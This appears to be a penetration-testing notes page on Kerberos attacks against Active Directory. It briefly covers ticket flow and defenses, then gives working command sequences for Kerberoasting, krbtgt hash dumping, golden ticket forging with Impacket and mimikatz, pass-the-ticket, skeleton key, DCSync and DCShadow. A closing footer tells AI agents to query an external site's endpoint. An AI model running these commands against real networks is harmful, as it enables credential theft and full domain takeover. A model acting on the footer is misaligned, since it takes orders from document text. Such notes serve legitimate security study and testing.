# Kerberos ## General * 3 Heads of Kerberos: * Client > TrustedServer/DC > Server ## Ticket Flow | **Ticket Flow** | Example | | --------------------------------- | ----------------------------- | | Request TGT > | Apply for Drivers License > | | < TGT + SessionKey | < Granted with Hologram | | TGT + Request to TGS > | Request go to to ABC Store > | | < ServiceTicket | < Approved w/ ABC Hash/Ticket | | Auth to Service w/ServiceTicket > | Going to ABC Store > | ## 3 Long-Term Keys 1. Client (me) 2. Target/Service key 3. KDC (from krbtgt acct) ## Group Policy for TGT Encryption * Computer Config > Policy > Windows Settings > Security Settings * \> Local Policy > Security Options Network Security: Configure enc types allowed for Kerb ## Attack Flow 1. Find AD Accts with SPN (map between service and svc-acct) 2. Request RC4 service tickets from DC 3. Extract Service Tickets to file 4. Offline Brute Force ## Kerberoasting Targets 1. MSSQL 2. AGPMServer (for GPO) 3. FIMService (Forefront Identity) 4. STS (Security Token Service VMWare) ## Defenses: * Disable RC4 with GPO * Use AES instead * Managed Service Accounts (no pw to change) * Protected Users - pw kerberos keys arent in lsass mem * PAC validation * CredentialGuard - hash and kerb/keys cant be stolen * Services like: "sqlsvc" should not be Domain Admin ## Kerberoasting ``` Connect to pc: PsExec64.exe -accepteula -u bob \\$IP cmd.exe pw-prompt: xxxx whoami ..bob ipconfig ..$IP Pull SPN's cd \tools\ke* > cscript.exe GetUserSPNs.vbs ...or: > GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output Found 'svcqlserver' w/RC4 (bad encryption) Request Ticket for svcsqlserver: C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'" Optional: Grabs tickets with Mimikatz and export to a list cd ../mim*/x64/ mimikatz.exe kerberos::list /export exit Crack the Kerb: cd C:\Tools\Kerberoast\ python tgsrepcrack.py dictionary.txt file.kirbi hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict Connect: cd c:\Tools\Sysinternals\ PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami pw-prompt: crackedpw hostname .. DC net user svcsqlserver /domain ..part of Domain Admins, yikes! win !! ``` * Other Method: * **Powerview** > Invoke-Kerberoast ## Golden Ticket * Impacket: * secretsdump.py * wmiexec.py * lookupsid.py * ticketer.py ### Get the nthash ``` > secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets krbtgt:502:abcxyz123...:thenthashxyz1111::: | nthash ``` ### Get the FQDN ``` > wmiexec.py mydom/svcsqlserver@$IP ipconfig /all Windows IP Configuration Host Name . . . . . . . . . . . . : DC01 Primary Dns Suffix . . . . . . . : mydom ``` ### Get the Domain SID ``` > lookupsid.py mydom/svcsqlserver@$IP Password: [*] Brute forcing SIDs at $IP [*] StringBinding ncacn_np:$IP[\pipe\lsarpc] [*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666 ``` ### Create a golden ticket! ``` > ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for mydom/Administrator [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncAsRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncASRepPart [*] Saving ticket in Administrator.ccache ``` ### Abuse * The golden ticket - DO NOT EXECUTE !!! * After exporting the **Administrator.ccache** ticket file.. * You can use any tool from the impacket suite like wmiexec or psexec with **-k -no-pass** ``` > export KRB5CCNAME=Administrator.ccache > wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k --no-pass ``` ## Mimikatz * Create a Golden Ticket with Mimikatz ``` mimikatz > kerberos::golden /krbtgt :e19xyz... /admin:root /domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin Creates "golden.ticket.bin" pass-the-ticket (ptt) mimikatz > ptt golden.ticket.bin ``` ## Skeleton Key (mimikatz) * Sets up a special key for login as **pw: mimikatz** * Patches the LSA Process in Memory * Requires Admin rights and Debug Privs * Reboot to 'clear' the setup ``` mimikatz# privilege::debug mimikatz# misc::skeleton Done! ``` ## DCSync (mimikatz) * Copies the "ntds.dit" * REF: [NTDS](/07-win-privesc/ntds.md) ``` m> lsadump:dcsync /user:administrator ``` ## DCShadow * Similar to DCSync * Register myself as a DC * Uses replication, so almost invisible Logging ## Mimikatz GT Lab ``` ----------------- Start cd \Tools\SysInternalsSuite\ PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe c:\Windows\System32 ..now on $IP!! whoami /user ..get the sid ----------------- Imposter: cd \tools\m*\x64 > mimikatz.exe m> lsadump::dcsync /user:fakedc .. i'm a dc named 'fakedc' .. Creds: we got the ntlm hash ----------------- Ticket: m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid Created: "ticket.kirbi" ----------------- Pass-the-ticket \\10.10.10.10\c$ ..copy the ticket cd \tools\m*\x64 > mimikatz.exe kerberos::ptt c:\Users\me\Desktop\ticket.kirbi exit klist ..shows the tickets ----------------- Exploit: From 10.10.10.10 PsExec64.exe -accepteula \\dc01 cmd.exe ..will use the ticket for auth! ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://pentest.mxhx.org/07-win-privesc/07-kerberos.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.